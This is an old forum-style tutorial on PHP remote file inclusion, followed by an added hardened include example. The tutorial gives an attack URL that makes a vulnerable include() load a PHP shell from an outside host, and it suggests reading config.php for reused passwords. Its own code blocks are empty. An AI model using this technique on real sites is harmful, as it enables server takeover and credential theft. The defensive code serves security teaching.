SSI Exploits (PHP Based)

A really serious exploit to have present. Here's a typical example:

http://www.host.com/index.php?page=links

Not all links that look like these are exploitable. Here's an insecure and a secure version to achieve the same effect:

Code:
-------------------------------------
INSECURE CODE
-------------------------------------

-------------------------------------

-------------------------------------
SECURE CODE
-------------------------------------

-------------------------------------

Now you 'may' be looking at those two examples and wondering what's different, how one's secure and the other is not. Well, the first one is insecure due to one line:

Code:
include($_GET['page'] . '.php');

If you don't know what it's doing there, I'll explain. It takes the variable from the URL (Uniform Resource Locator), which in this case is page (hence $_GET['page']). It then appends the '.php' extension on the end and includes the page. Here's how it should work:

## User visits - http://www.host.com/index.php?page=links
## Server includes - /links.php

Now this is all fine and well as long as someone clicks a link that exists. Now let's see what happens if it doesn't:

## User visits - http://www.host.com/index.php?page=foo
## Server tries to include /foo.php, but foo.php doesn't exist, so it returns the following:

Error:
Warning: main(foo.php): failed to open stream: No such file or directory in /home/yourname/public_html/foo.php on line 4
Warning: main(): Failed opening 'foo.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/cpanel/3rdparty/lib/php') in /home/yourname/public_html/foo.php on line 4

This error will vary from host to host. Now this example is perfectly harmless; if we wanted to take advantage of it, we could do something resembling this:

## Sign up to a free webhosting account with no PHP support (the server will then not parse the PHP)
## Upload a PHP script which would perform the desired request. For example 'foo.php' containing:

## Execute the script via the URL - http://www.host.com/index.php?page=http://www.yourhost.com/foo
## Server includes http://www.yourhost.com/foo.php, parsing any code in the file, which in this case is a shell (providing the server allows it)
## Final output:

-rw------- 1 0 1000 FEB 24 2003 index.php
-rw------- 1 0 1000 FEB 24 2003 links.php
-rw------- 1 0 1000 FEB 24 2003 affiliates.php
-rw------- 1 0 1000 FEB 24 2003 pictures.php

So now we can execute any PHP (possibly a shell) on the webhost with the script running. A lot of website owners do something very stupid and use the same password for both their MySQL and FTP. If you read a config.php you can usually get the password/passwords.

The second example doesn't include anything that doesn't exist, so it avoids this issue altogether. Although a lot more lengthy, it's a much better idea. There are other safe methods, such as using file_exists() to check the file is present and simple regular expressions to filter characters.

Hope this was a help to someone. I started writing it for a PHP Security Article that I didn't get round to completing and thought someone might find it of interest. Feedback is welcome,

- Insiszor
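The post's own SECURE CODE block did not survive, so the following is an added example (my code, not the original poster's) of a hardened replacement for the vulnerable include. It combines the three defences the post names, an explicit list of known pages, a file_exists()-style check and a regular-expression filter, and adds a realpath() confinement on top. It assumes PHP 7 or later, a pages/ directory next to the script, and the page list and function name resolve_page are mine.

```php
<?php
// Added example, not the original post's code. Hardened replacement for:
//     include($_GET['page'] . '.php');
// Assumptions: PHP 7+, all includable pages live in PAGES_DIR, and KNOWN_PAGES
// lists every page the site serves.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';   // assumed layout

// Allowlist of page names. Unknown names are rejected before the filesystem is
// touched, so "page=foo" never triggers the "failed to open stream" warning
// that leaks the document root to the visitor.
const KNOWN_PAGES = ['index', 'links', 'affiliates', 'pictures'];

/**
 * Map the raw ?page= value to an absolute file path, or null if it must not be
 * included. $pagesDir is a parameter only so the CLI demo below can use a
 * temporary directory.
 */
function resolve_page(?string $page, string $pagesDir = PAGES_DIR): ?string
{
    if ($page === null || $page === '') {
        $page = 'index';                 // default page
    }

    // 1. Syntactic filter: lowercase letters, digits, hyphen, underscore only.
    //    On its own this already rules out "http://", "../" and NUL bytes.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $page)) {
        return null;
    }

    // 2. Allowlist: the name must be one the site actually knows.
    if (!in_array($page, KNOWN_PAGES, true)) {
        return null;
    }

    // 3. Existence plus confinement. realpath() returns false for a missing
    //    file (the post's file_exists() idea) and resolves symlinks and "..",
    //    so we can insist the result lies inside $pagesDir. file_exists() alone
    //    would return true for "../../etc/passwd".
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    return $path;
}

if (PHP_SAPI === 'cli') {
    // Stand-alone demonstration with a constructed pages directory holding one
    // real page, links.php, and constructed inputs including those from the post.
    $dir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/links.php', "<?php echo \"links page\\n\";\n");

    $samples = ['links', 'foo', 'http://www.yourhost.com/foo', '../config', "links\0"];
    foreach ($samples as $in) {
        // Only "links" resolves; every other input is rejected by one of the stages.
        printf("%-30s => %s\n", addcslashes($in, "\0"), resolve_page($in, $dir) ?? 'rejected');
    }

    unlink($dir . '/links.php');
    rmdir($dir);
} else {
    // Web request: a rejected value gets a plain 404. The attacker-controlled
    // string is never echoed back and PHP's include warning never reaches the
    // client.
    $path = resolve_page($_GET['page'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
        exit;
    }
    include $path;
}
```

Two caveats worth keeping in mind when applying the post's shorter suggestions on their own: file_exists() accepts any path that exists, so it stops the remote-URL case but not a local traversal such as `../config`, which is why the example pairs it with the allowlist and the realpath() prefix check; and since PHP 5.2 the `allow_url_include` setting defaults to Off, which blocks the `page=http://...` form on an up-to-date host, but it does nothing for the local variant, so it is a backstop rather than a fix. With `display_errors` turned off in production, a failed include also stops revealing paths like `/home/yourname/public_html/` in the response.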